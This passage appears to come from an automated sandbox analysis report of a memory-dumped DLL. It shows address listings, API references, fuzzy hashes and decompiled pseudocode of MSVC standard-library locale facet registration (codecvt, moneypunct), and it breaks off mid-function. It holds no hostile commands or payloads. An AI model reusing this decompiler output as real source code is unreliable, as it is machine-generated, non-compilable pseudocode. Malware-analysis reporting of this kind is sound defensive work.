0x6e19976b
0x00000000
0x6e19976b
0x6e199732
0x6e199732
0x00000000
0x6e199732
0x6e199730
0x6e1996b4
0x6e1996b4
0x6e1996b7
0x6e1996bb
0x6e1996bf
0x6e1996cc
0x6e1996d4
0x6e1996d6
0x00000000
0x6e1996d6
0x6e19969d
0x6e19969d
0x00000000
0x6e19969d
0x6e19969b
0x6e19961f
0x6e19961f
0x6e199622
0x6e199626
0x6e19962a
0x6e199637
0x6e19963f
0x6e199641
0x00000000
0x6e199641
0x6e199608
0x6e199608
0x00000000
0x6e199608
0x6e199606
0x6e19958a
0x6e19958a
0x6e19958d
0x6e199591
0x6e199595
0x6e1995a2
0x6e1995aa
0x6e1995ac
0x00000000
0x6e1995ac
0x6e199573
0x6e199573
0x00000000
0x6e199573
0x6e199571
0x6e1994f5
0x6e1994f5
0x6e1994f8
0x6e1994fc
0x6e199500
0x6e19950d
0x6e199515
0x6e199517
0x00000000
0x6e199517
0x6e1994de
0x6e1994de
0x00000000
0x6e1994de
0x6e1994dc
0x6e199460
0x6e199460
0x6e199463
0x6e199467
0x6e19946b
0x6e199478
0x6e199480
0x6e199482
0x00000000
0x6e199482
0x6e199449
0x6e199449
0x00000000
0x6e199449
0x6e199447
0x6e1993cb
0x6e1993cb
0x6e1993ce
0x6e1993d2
0x6e1993d6
0x6e1993e3
0x6e1993eb
0x6e1993ed
0x00000000
0x6e1993ed
0x6e1993b4
0x6e1993b4
0x00000000
0x6e1993b4
0x6e1993b2
0x6e199336
0x6e199336
0x6e199339
0x6e19933d
0x6e199341
0x6e19934e
0x6e199356
0x6e199358
0x00000000
0x6e199358
0x6e19931f
0x6e19931f
0x00000000
0x6e19931f
0x6e19931d
0x6e1992a1
0x6e1992a1
0x6e1992a4
0x6e1992a8
0x6e1992ac
0x6e1992b9
0x6e1992c1
0x6e1992c3
0x00000000
0x6e1992c3
0x6e19928a
0x6e19928a
0x00000000
0x6e19928a
0x6e199288
0x6e19920c
0x6e19920c
0x6e19920f
0x6e199213
0x6e199217
0x6e199224
0x6e19922c
0x6e19922e
0x00000000
0x6e19922e
0x6e1991f5
0x6e1991f5
0x00000000
0x6e1991f5
0x6e1991f3
0x6e199177
0x6e199177
0x6e19917a
0x6e19917e
0x6e199182
0x6e19918f
0x6e199197
0x6e199199
0x00000000
0x6e199199
0x6e199160
0x6e199160
0x00000000
0x6e199160
0x6e19915e
0x6e1990e2
0x6e1990e2
0x6e1990e5
0x6e1990e9
0x6e1990ed
0x6e1990fa
0x6e199102
0x6e199104
0x00000000
0x6e199104
0x6e1990cb
0x6e1990cb
0x00000000
0x6e1990cb
0x6e1990c9
0x6e19904d
0x6e19904d
0x6e199050
0x6e199054
0x6e199058
0x6e199065
0x6e19906d
0x6e19906f
0x00000000
0x6e19906f
0x6e199036
0x6e199036
0x00000000
0x6e199036
0x6e199034
0x6e198fb8
0x6e198fb8
0x6e198fbb
0x6e198fbf
0x6e198fc3
0x6e198fd0
0x6e198fd8
0x6e198fda
0x00000000
0x6e198fda
0x6e198fa1
0x6e198fa1
0x00000000
0x6e198fa1
0x6e198f9f
0x6e198f23
0x6e198f23
0x6e198f26
0x6e198f2a
0x6e198f2e
0x6e198f3b
0x6e198f43
0x6e198f45
0x00000000
0x6e198f45
0x6e198f0c
0x6e198f0c
0x00000000
0x6e198f0c
0x6e198f0a
0x6e198e8e
0x6e198e8e
0x6e198e91
0x6e198e95
0x6e198e99
0x6e198ea6
0x6e198eae
0x6e198eb0
0x00000000
0x6e198eb0
0x6e198e77
0x6e198e77
0x00000000
0x6e198e77
0x6e198e75
0x6e198df9
0x6e198df9
0x6e198dfc
0x6e198e00
0x6e198e04
0x6e198e11
0x6e198e19
0x6e198e1b
0x00000000
0x6e198e1b
0x6e198de2
0x6e198de2
0x00000000
0x6e198de2
0x6e198de0
0x6e198d64
0x6e198d64
0x6e198d67
0x6e198d6b
0x6e198d6f
0x6e198d7c
0x6e198d84
0x6e198d86
0x00000000
0x6e198d86
0x6e198d4d
0x6e198d4d
0x00000000
0x6e198d4d
0x6e198d4b
0x6e198ccf
0x6e198ccf
0x6e198cd2
0x6e198cd6
0x6e198cda
0x6e198ce7
0x6e198cef
0x6e198cf1
0x00000000
0x6e198cf1
0x6e198cb8
0x6e198cb8
0x00000000
0x6e198cb8
0x6e198cb6

APIs

__EH_prolog3.LIBCMT ref: 6E198C7F
std::_Lockit::_Lockit.LIBCPMT ref: 6E198C89

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

codecvt.LIBCPMT ref: 6E198CC3
std::_Facet_Register.LIBCPMT ref: 6E198CDA
std::_Lockit::~_Lockit.LIBCPMT ref: 6E198CFA
Concurrency::cancel_current_task.LIBCPMT ref: 6E198D07

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registercodecvt
String ID:
API String ID: 614290800-0
Opcode ID: 74aba47e3ea7362393986cacc40b0576e7c3834b6ab09e8cd0c3d851c3140ebc
Instruction ID: 394e12805d4733e4918c964a3baea71fa44e8d2b4192e725d344a79ec5cb6fa7
Opcode Fuzzy Hash: 74aba47e3ea7362393986cacc40b0576e7c3834b6ab09e8cd0c3d851c3140ebc
Instruction Fuzzy Hash: 1001D63590051ADFCF05DBE4D814AFD7779AF84314F244809E821AB280CF7099C5FB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A5C89, Relevance: 9.0, APIs: 6, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E6E1A5C89(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t50;
				void* _t77;
				signed int _t116;
				void* _t126;
				signed int _t129;
				signed int _t130;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				signed int _t135;
				void* _t139;

				_t98 = __ebx;
				E6E1A9DBF(0x6e1ec3ec, __ebx, __edi, __esi, 8);
				E6E18F2A5(_t139 - 0x14, 0);
				_t132 =  *0x6e221768; // 0x0
				 *(_t139 - 4) =  *(_t139 - 4) & 0x00000000;
				 *(_t139 - 0x10) = _t132;
				_t50 = E6E162171( *((intOrPtr*)(_t139 + 8)), E6E161F29(__ebx, 0x6e22174c, __edi, _t132));
				_t128 = _t50;
				if(_t50 != 0) {
					L5:
					E6E18F30C(_t139 - 0x14);
					return E6E1A9D88(_t128);
				} else {
					if(_t132 == 0) {
						_push( *((intOrPtr*)(_t139 + 8)));
						_push(_t139 - 0x10);
						__eflags = E6E1A6237(__ebx, _t128, _t132) - 0xffffffff;
						if(__eflags == 0) {
							E6E161CB5(__eflags);
							asm("int3");
							E6E1A9DBF(0x6e1ec3ec, _t98, _t128, _t132, 8);
							E6E18F2A5(_t139 - 0x14, 0);
							_t133 =  *0x6e221770; // 0x0
							 *(_t139 - 4) =  *(_t139 - 4) & 0x00000000;
							 *(_t139 - 0x10) = _t133;
							_t129 = E6E162171( *((intOrPtr*)(_t139 + 8)), E6E161F29(_t98, 0x6e221754, _t128, _t133));
							__eflags = _t129;
							if(_t129 != 0) {
								L12:
								E6E18F30C(_t139 - 0x14);
								return E6E1A9D88(_t129);
							} else {
								__eflags = _t133;
								if(_t133 == 0) {
									_push( *((intOrPtr*)(_t139 + 8)));
									_push(_t139 - 0x10);
									__eflags = E6E1A62BC(_t98, _t129, _t133) - 0xffffffff;
									if(__eflags == 0) {
										E6E161CB5(__eflags);
										asm("int3");
										E6E1A9DBF(0x6e1ec3ec, _t98, _t129, _t133, 8);
										E6E18F2A5(_t139 - 0x14, 0);
										_t134 =  *0x6e221774; // 0x0
										 *(_t139 - 4) =  *(_t139 - 4) & 0x00000000;
										 *(_t139 - 0x10) = _t134;
										_t130 = E6E162171( *((intOrPtr*)(_t139 + 8)), E6E161F29(_t98, 0x6e221758, _t129, _t134));
										__eflags = _t130;
										if(_t130 != 0) {
											L19:
											E6E18F30C(_t139 - 0x14);
											return E6E1A9D88(_t130);
										} else {
											__eflags = _t134;
											if(_t134 == 0) {
												_push( *((intOrPtr*)(_t139 + 8)));
												_push(_t139 - 0x10);
												_t77 = E6E1A6328(_t98, _t130, _t134);
												_pop(_t116);
												__eflags = _t77 - 0xffffffff;
												if(__eflags == 0) {
													E6E161CB5(__eflags);
													asm("int3");
													E6E1A9DBF(0x6e1ecb1a, _t98, _t130, _t134, 4);
													_t135 = _t116;
													 *(_t139 - 0x10) = _t135;
													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t139 + 0xc));
													_push( *((intOrPtr*)(_t139 + 0x14)));
													_t43 = _t139 - 4;
													 *_t43 =  *(_t139 - 4) & 0x00000000;
													__eflags =  *_t43;
													 *_t135 = 0x6e1f25a4;
													 *((char*)(_t135 + 0x28)) =  *((intOrPtr*)(_t139 + 0x10));
													E6E1A7184(_t98, _t116, _t126, _t130, _t135,  *_t43);
													return E6E1A9D88(_t135,  *((intOrPtr*)(_t139 + 8)));
												} else {
													_t130 =  *(_t139 - 0x10);
													 *(_t139 - 0x10) = _t130;
													 *(_t139 - 4) = 1;
													E6E1911C1(__eflags, _t130);
													 *0x6e1ee1b4();
													 *((intOrPtr*)( *((intOrPtr*)( *_t130 + 4))))();
													 *0x6e221774 = _t130;
													goto L19;
												}
											} else {
												_t130 = _t134;
												goto L19;
											}
										}
									} else {
										_t129 =  *(_t139 - 0x10);
										 *(_t139 - 0x10) = _t129;
										 *(_t139 - 4) = 1;
										E6E1911C1(__eflags, _t129);
										 *0x6e1ee1b4();
										 *((intOrPtr*)( *((intOrPtr*)( *_t129 + 4))))();
										 *0x6e221770 = _t129;
										goto L12;
									}
								} else {
									_t129 = _t133;
									goto L12;
								}
							}
						} else {
							_t128 =  *(_t139 - 0x10);
							 *(_t139 - 0x10) = _t128;
							 *(_t139 - 4) = 1;
							E6E1911C1(__eflags, _t128);
							 *0x6e1ee1b4();
							 *((intOrPtr*)( *((intOrPtr*)( *_t128 + 4))))();
							 *0x6e221768 = _t128;
							goto L5;
						}
					} else {
						_t128 = _t132;
						goto L5;
					}
				}
			}

0x6e1a5c89
0x6e1a5c90
0x6e1a5c9a
0x6e1a5c9f
0x6e1a5caa
0x6e1a5cae
0x6e1a5cba
0x6e1a5cbf
0x6e1a5cc3
0x6e1a5d08
0x6e1a5d0b
0x6e1a5d17
0x6e1a5cc5
0x6e1a5cc7
0x6e1a5ccd
0x6e1a5cd3
0x6e1a5cdb
0x6e1a5cde
0x6e1a5d18
0x6e1a5d1d
0x6e1a5d25
0x6e1a5d2f
0x6e1a5d34
0x6e1a5d3f
0x6e1a5d43
0x6e1a5d54
0x6e1a5d56
0x6e1a5d58
0x6e1a5d9d
0x6e1a5da0
0x6e1a5dac
0x6e1a5d5a
0x6e1a5d5a
0x6e1a5d5c
0x6e1a5d62
0x6e1a5d68
0x6e1a5d70
0x6e1a5d73
0x6e1a5dad
0x6e1a5db2
0x6e1a5dba
0x6e1a5dc4
0x6e1a5dc9
0x6e1a5dd4
0x6e1a5dd8
0x6e1a5de9
0x6e1a5deb
0x6e1a5ded
0x6e1a5e32
0x6e1a5e35
0x6e1a5e41
0x6e1a5def
0x6e1a5def
0x6e1a5df1
0x6e1a5df7
0x6e1a5dfd
0x6e1a5dfe
0x6e1a5e04
0x6e1a5e05
0x6e1a5e08
0x6e1a5e42
0x6e1a5e47
0x6e1a5e4f
0x6e1a5e54
0x6e1a5e56
0x6e1a5e5c
0x6e1a5e5f
0x6e1a5e68
0x6e1a5e68
0x6e1a5e68
0x6e1a5e6c
0x6e1a5e72
0x6e1a5e75
0x6e1a5e81
0x6e1a5e0a
0x6e1a5e0a
0x6e1a5e0d
0x6e1a5e11
0x6e1a5e15
0x6e1a5e22
0x6e1a5e2a
0x6e1a5e2c
0x00000000
0x6e1a5e2c
0x6e1a5df3
0x6e1a5df3
0x00000000
0x6e1a5df3
0x6e1a5df1
0x6e1a5d75
0x6e1a5d75
0x6e1a5d78
0x6e1a5d7c
0x6e1a5d80
0x6e1a5d8d
0x6e1a5d95
0x6e1a5d97
0x00000000
0x6e1a5d97
0x6e1a5d5e
0x6e1a5d5e
0x00000000
0x6e1a5d5e
0x6e1a5d5c
0x6e1a5ce0
0x6e1a5ce0
0x6e1a5ce3
0x6e1a5ce7
0x6e1a5ceb
0x6e1a5cf8
0x6e1a5d00
0x6e1a5d02
0x00000000
0x6e1a5d02
0x6e1a5cc9
0x6e1a5cc9
0x00000000
0x6e1a5cc9
0x6e1a5cc7

APIs

__EH_prolog3.LIBCMT ref: 6E1A5C90
std::_Lockit::_Lockit.LIBCPMT ref: 6E1A5C9A

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

moneypunct.LIBCPMT ref: 6E1A5CD4
std::_Facet_Register.LIBCPMT ref: 6E1A5CEB
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A5D0B
Concurrency::cancel_current_task.LIBCPMT ref: 6E1A5D18

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermoneypunct
String ID:
API String ID: 2743796646-0
Opcode ID: 1ec32f4641490b53c5ff8523f04be55eacc98af68c178b79e1d51544e5577390
Instruction ID: 943a61ba7dc438d287af88a0061a145d8f19d911c79bc52c60fe55c4d2a9d107
Opcode Fuzzy Hash: 1ec32f4641490b53c5ff8523f04be55eacc98af68c178b79e1d51544e5577390
Instruction Fuzzy Hash: 9A01D6399006199FCF05DBE8C814AFD77B9AF84314F244809E921BB280CF3099C4EB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E198D0D, Relevance: 9.0, APIs: 6, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E6E198D0D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t266;
				void* _t491;
				signed int _t710;
				void* _t774;
				signed int _t777;
				signed int _t778;
				signed int _t779;
				signed int _t780;
				signed int _t781;
				signed int _t782;
				signed int _t783;
				signed int _t784;
				signed int _t785;
				signed int _t786;
				signed int _t787;
				signed int _t788;
				signed int _t789;
				signed int _t790;
				signed int _t791;
				signed int _t792;
				signed int _t793;
				signed int _t794;
				signed int _t795;
				signed int _t796;
				signed int _t798;
				signed int _t799;
				signed int _t800;
				signed int _t801;
				signed int _t802;
				signed int _t803;
				signed int _t804;
				signed int _t805;
				signed int _t806;
				signed int _t807;
				signed int _t808;
				signed int _t809;
				signed int _t810;
				signed int _t811;
				signed int _t812;
				signed int _t813;
				signed int _t814;
				signed int _t815;
				signed int _t816;
				signed int _t817;
				signed int _t818;
				signed int _t819;
				void* _t841;

				_t774 = __edx;
				_t584 = __ebx;
				E6E1A9DBF(0x6e1ec3ec, __ebx, __edi, __esi, 8);
				E6E18F2A5(_t841 - 0x14, 0);
				_t798 =  *0x6e22171c; // 0x0
				 *(_t841 - 4) =  *(_t841 - 4) & 0x00000000;
				 *(_t841 - 0x10) = _t798;
				_t266 = E6E162171( *((intOrPtr*)(_t841 + 8)), E6E161F29(__ebx, 0x6e2216c8, __edi, _t798));
				_t776 = _t266;
				if(_t266 != 0) {
					L5:
					E6E18F30C(_t841 - 0x14);
					return E6E1A9D88(_t776);
				} else {
					if(_t798 == 0) {
						_push( *((intOrPtr*)(_t841 + 8)));
						_push(_t841 - 0x10);
						__eflags = E6E19A94F(__ebx, _t774, _t776, _t798) - 0xffffffff;
						if(__eflags == 0) {
							E6E161CB5(__eflags);
							asm("int3");
							E6E1A9DBF(0x6e1ec3ec, _t584, _t776, _t798, 8);
							E6E18F2A5(_t841 - 0x14, 0);
							_t799 =  *0x6e2216ec; // 0x0
							 *(_t841 - 4) =  *(_t841 - 4) & 0x00000000;
							 *(_t841 - 0x10) = _t799;
							_t777 = E6E162171( *((intOrPtr*)(_t841 + 8)), E6E161F29(_t584, 0x6e2216a0, _t776, _t799));
							__eflags = _t777;
							if(_t777 != 0) {
								L12:
								E6E18F30C(_t841 - 0x14);
								return E6E1A9D88(_t777);
							} else {
								__eflags = _t799;
								if(_t799 == 0) {
									_push( *((intOrPtr*)(_t841 + 8)));
									_push(_t841 - 0x10);
									__eflags = E6E19A9F1(_t584, _t774, _t777, _t799) - 0xffffffff;
									if(__eflags == 0) {
										E6E161CB5(__eflags);
										asm("int3");
										E6E1A9DBF(0x6e1ec3ec, _t584, _t777, _t799, 8);
										E6E18F2A5(_t841 - 0x14, 0);
										_t800 =  *0x6e22170c; // 0x0
										 *(_t841 - 4) =  *(_t841 - 4) & 0x00000000;
										 *(_t841 - 0x10) = _t800;
										_t778 = E6E162171( *((intOrPtr*)(_t841 + 8)), E6E161F29(_t584, 0x6e221470, _t777, _t800));
										__eflags = _t778;
										if(_t778 != 0) {
											L19:
											E6E18F30C(_t841 - 0x14);
											return E6E1A9D88(_t778);
										} else {
											__eflags = _t800;
											if(_t800 == 0) {
												_push( *((intOrPtr*)(_t841 + 8)));
												_push(_t841 - 0x10);
												__eflags = E6E19AA93(_t584, _t778, _t800) - 0xffffffff;
												if(__eflags == 0) {
													E6E161CB5(__eflags);
													asm("int3");
													E6E1A9DBF(0x6e1ec3ec, _t584, _t778, _t800, 8);
													E6E18F2A5(_t841 - 0x14, 0);
													_t801 =  *0x6e221720; // 0x0
													 *(_t841 - 4) =  *(_t841 - 4) & 0x00000000;
													 *(_t841 - 0x10) = _t801;
													_t779 = E6E162171( *((intOrPtr*)(_t841 + 8)), E6E161F29(_t584, 0x6e2216cc, _t778, _t801));
													__eflags = _t779;
													if(_t779 != 0) {
														L26:
														E6E18F30C(_t841 - 0x14);
														return E6E1A9D88(_t779);
													} else {
														__eflags = _t801;
														if(_t801 == 0) {
															_push( *((intOrPtr*)(_t841 + 8)));
															_push(_t841 - 0x10);
															__eflags = E6E19AB03(_t584, _t779, _t801) - 0xffffffff;
															if(__eflags == 0) {
																E6E161CB5(__eflags);
																asm("int3");
																E6E1A9DBF(0x6e1ec3ec, _t584, _t779, _t801, 8);
																E6E18F2A5(_t841 - 0x14, 0);
																_t802 =  *0x6e2216f0; // 0x0
																 *(_t841 - 4) =  *(_t841 - 4) & 0x00000000;
																 *(_t841 - 0x10) = _t802;
																_t780 = E6E162171( *((intOrPtr*)(_t841 + 8)), E6E161F29(_t584, 0x6e2216a4, _t779, _t802));
																__eflags = _t780;
																if(_t780 != 0) {
																	L33:
																	E6E18F30C(_t841 - 0x14);
																	return E6E1A9D88(_t780);
																} else {
																	__eflags = _t802;
																	if(_t802 == 0) {
																		_push( *((intOrPtr*)(_t841 + 8)));
																		_push(_t841 - 0x10);
																		__eflags = E6E19AB6B(_t584, _t780, _t802) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E161CB5(__eflags);
																			asm("int3");
																			E6E1A9DBF(0x6e1ec3ec, _t584, _t780, _t802, 8);
																			E6E18F2A5(_t841 - 0x14, 0);
																			_t803 =  *0x6e221724; // 0x0
																			 *(_t841 - 4) =  *(_t841 - 4) & 0x00000000;
																			 *(_t841 - 0x10) = _t803;
																			_t781 = E6E162171( *((intOrPtr*)(_t841 + 8)), E6E161F29(_t584, 0x6e2216d0, _t780, _t803));
																			__eflags = _t781;
																			if(_t781 != 0) {
																				L40:
																				E6E18F30C(_t841 - 0x14);
																				return E6E1A9D88(_t781);
																			} else {
																				__eflags = _t803;
																				if(_t803 == 0) {
																					_push( *((intOrPtr*)(_t841 + 8)));
																					_push(_t841 - 0x10);
																					__eflags = E6E19ABD3(_t584, _t781, _t803) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E161CB5(__eflags);
																						asm("int3");
																						E6E1A9DBF(0x6e1ec3ec, _t584, _t781, _t803, 8);
																						E6E18F2A5(_t841 - 0x14, 0);
																						_t804 =  *0x6e2216f4; // 0x0
																						 *(_t841 - 4) =  *(_t841 - 4) & 0x00000000;
																						 *(_t841 - 0x10) = _t804;
																						_t782 = E6E162171( *((intOrPtr*)(_t841 + 8)), E6E161F29(_t584, 0x6e2216a8, _t781, _t804));
																						__eflags = _t782;
																						if(_t782 != 0) {
																							L47:
																							E6E18F30C(_t841 - 0x14);
																							return E6E1A9D88(_t782);
																						} else {
																							__eflags = _t804;
																							if(_t804 == 0) {
																								_push( *((intOrPtr*)(_t841 + 8)));
																								_push(_t841 - 0x10);
																								__eflags = E6E19AC3B(_t584, _t782, _t804) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E161CB5(__eflags);
																									asm("int3");
																									E6E1A9DBF(0x6e1ec3ec, _t584, _t782, _t804, 8);
																									E6E18F2A5(_t841 - 0x14, 0);
																									_t805 =  *0x6e221728; // 0x0
																									 *(_t841 - 4) =  *(_t841 - 4) & 0x00000000;
																									 *(_t841 - 0x10) = _t805;
																									_t783 = E6E162171( *((intOrPtr*)(_t841 + 8)), E6E161F29(_t584, 0x6e2216d4, _t782, _t805));
																									__eflags = _t783;
																									if(_t783 != 0) {
																										L54:
																										E6E18F30C(_t841 - 0x14);
																										return E6E1A9D88(_t783);
																									} else {
																										__eflags = _t805;
																										if(_t805 == 0) {
																											_push( *((intOrPtr*)(_t841 + 8)));
																											_push(_t841 - 0x10);
																											__eflags = E6E19ACA3(_t584, _t783, _t805) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E161CB5(__eflags);
																												asm("int3");
																												E6E1A9DBF(0x6e1ec3ec, _t584, _t783, _t805, 8);
																												E6E18F2A5(_t841 - 0x14, 0);
																												_t806 =  *0x6e2216f8; // 0x0
																												 *(_t841 - 4) =  *(_t841 - 4) & 0x00000000;
																												 *(_t841 - 0x10) = _t806;
																												_t784 = E6E162171( *((intOrPtr*)(_t841 + 8)), E6E161F29(_t584, 0x6e2216ac, _t783, _t806));
																												__eflags = _t784;
																												if(_t784 != 0) {
																													L61:
																													E6E18F30C(_t841 - 0x14);
																													return E6E1A9D88(_t784);
																												} else {
																													__eflags = _t806;
																													if(_t806 == 0) {
																														_push( *((intOrPtr*)(_t841 + 8)));
																														_push(_t841 - 0x10);
																														__eflags = E6E19AD0B(_t584, _t784, _t806) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E161CB5(__eflags);
																															asm("int3");
																															E6E1A9DBF(0x6e1ec3ec, _t584, _t784, _t806, 8);
																															E6E18F2A5(_t841 - 0x14, 0);
																															_t807 =  *0x6e221730; // 0x0
																															 *(_t841 - 4) =  *(_t841 - 4) & 0x00000000;
																															 *(_t841 - 0x10) = _t807;
																															_t785 = E6E162171( *((intOrPtr*)(_t841 + 8)), E6E161F29(_t584, 0x6e2216dc, _t784, _t807));
																															__eflags = _t785;
																															if(_t785 != 0) {
																																L68:
																																E6E18F30C(_t841 - 0x14);
																																return E6E1A9D88(_t785);
																															} else {
																																__eflags = _t807;
																																if(_t807 == 0) {
																																	_push( *((intOrPtr*)(_t841 + 8)));
																																	_push(_t841 - 0x10);
																																	__eflags = E6E19AD73(_t584, _t785, _t807) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E161CB5(__eflags);
																																		asm("int3");
																																		E6E1A9DBF(0x6e1ec3ec, _t584, _t785, _t807, 8);
																																		E6E18F2A5(_t841 - 0x14, 0);
																																		_t808 =  *0x6e22172c; // 0x0
																																		 *(_t841 - 4) =  *(_t841 - 4) & 0x00000000;
																																		 *(_t841 - 0x10) = _t808;
																																		_t786 = E6E162171( *((intOrPtr*)(_t841 + 8)), E6E161F29(_t584, 0x6e2216d8, _t785, _t808));
																																		__eflags = _t786;
																																		if(_t786 != 0) {
																																			L75:
																																			E6E18F30C(_t841 - 0x14);
																																			return E6E1A9D88(_t786);
																																		} else {
																																			__eflags = _t808;
																																			if(_t808 == 0) {
																																				_push( *((intOrPtr*)(_t841 + 8)));
																																				_push(_t841 - 0x10);
																																				__eflags = E6E19ADF7(_t584, _t786, _t808) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E161CB5(__eflags);
																																					asm("int3");
																																					E6E1A9DBF(0x6e1ec3ec, _t584, _t786, _t808, 8);
																																					E6E18F2A5(_t841 - 0x14, 0);
																																					_t809 =  *0x6e221700; // 0x0
																																					 *(_t841 - 4) =  *(_t841 - 4) & 0x00000000;
																																					 *(_t841 - 0x10) = _t809;
																																					_t787 = E6E162171( *((intOrPtr*)(_t841 + 8)), E6E161F29(_t584, 0x6e2216b4, _t786, _t809));
																																					__eflags = _t787;
																																					if(_t787 != 0) {
																																						L82:
																																						E6E18F30C(_t841 - 0x14);
																																						return E6E1A9D88(_t787);
																																					} else {
																																						__eflags = _t809;
																																						if(_t809 == 0) {
																																							_push( *((intOrPtr*)(_t841 + 8)));
																																							_push(_t841 - 0x10);
																																							__eflags = E6E19AE7C(_t584, _t787, _t809) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E161CB5(__eflags);
																																								asm("int3");
																																								E6E1A9DBF(0x6e1ec3ec, _t584, _t787, _t809, 8);
																																								E6E18F2A5(_t841 - 0x14, 0);
																																								_t810 =  *0x6e2216fc; // 0x0
																																								 *(_t841 - 4) =  *(_t841 - 4) & 0x00000000;
																																								 *(_t841 - 0x10) = _t810;
																																								_t788 = E6E162171( *((intOrPtr*)(_t841 + 8)), E6E161F29(_t584, 0x6e2216b0, _t787, _t810));
																																								__eflags = _t788;
																																								if(_t788 != 0) {
																																									L89:
																																									E6E18F30C(_t841 - 0x14);
																																									return E6E1A9D88(_t788);
																																								} else {
																																									__eflags = _t810;
																																									if(_t810 == 0) {
																																										_push( *((intOrPtr*)(_t841 + 8)));
																																										_push(_t841 - 0x10);
																																										__eflags = E6E19AF00(_t584, _t788, _t810) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E161CB5(__eflags);
																																											asm("int3");
																																											E6E1A9DBF(0x6e1ec3ec, _t584, _t788, _t810, 8);
																																											E6E18F2A5(_t841 - 0x14, 0);
																																											_t811 =  *0x6e221710; // 0x0
																																											 *(_t841 - 4) =  *(_t841 - 4) & 0x00000000;
																																											 *(_t841 - 0x10) = _t811;
																																											_t789 = E6E162171( *((intOrPtr*)(_t841 + 8)), E6E161F29(_t584, 0x6e2216bc, _t788, _t811));
																																											__eflags = _t789;
																																											if(_t789 != 0) {
																																												L96:
																																												E6E18F30C(_t841 - 0x14);
																																												return E6E1A9D88(_t789);
																																											} else {
																																												__eflags = _t811;
																																												if(_t811 == 0) {
																																													_push( *((intOrPtr*)(_t841 + 8)));
																																													_push(_t841 - 0x10);
																																													__eflags = E6E19AF85(_t584, _t789, _t811) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6E161CB5(__eflags);
																																														asm("int3");
																																														E6E1A9DBF(0x6e1ec3ec, _t584, _t789, _t811, 8);
																																														E6E18F2A5(_t841 - 0x14, 0);
																																														_t812 =  *0x6e2216e8; // 0x0
																																														 *(_t841 - 4) =  *(_t841 - 4) & 0x00000000;
																																														 *(_t841 - 0x10) = _t812;
																																														_t790 = E6E162171( *((intOrPtr*)(_t841 + 8)), E6E161F29(_t584, 0x6e22169c, _t789, _t812));
																																														__eflags = _t790;
																																														if(_t790 != 0) {
																																															L103:
																																															E6E18F30C(_t841 - 0x14);
																																															return E6E1A9D88(_t790);
																																														} else {
																																															__eflags = _t812;
																																															if(_t812 == 0) {
																																																_push( *((intOrPtr*)(_t841 + 8)));
																																																_push(_t841 - 0x10);
																																																__eflags = E6E19AFED(_t584, _t790, _t812) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6E161CB5(__eflags);
																																																	asm("int3");
																																																	E6E1A9DBF(0x6e1ec3ec, _t584, _t790, _t812, 8);
																																																	E6E18F2A5(_t841 - 0x14, 0);
																																																	_t813 =  *0x6e221714; // 0x0
																																																	 *(_t841 - 4) =  *(_t841 - 4) & 0x00000000;
																																																	 *(_t841 - 0x10) = _t813;
																																																	_t791 = E6E162171( *((intOrPtr*)(_t841 + 8)), E6E161F29(_t584, 0x6e2216c0, _t790, _t813));
																																																	__eflags = _t791;
																																																	if(_t791 != 0) {
																																																		L110:
																																																		E6E18F30C(_t841 - 0x14);
																																																		return E6E1A9D88(_t791);
																																																	} else {
																																																		__eflags = _t813;
																																																		if(_t813 == 0) {
																																																			_push( *((intOrPtr*)(_t841 + 8)));
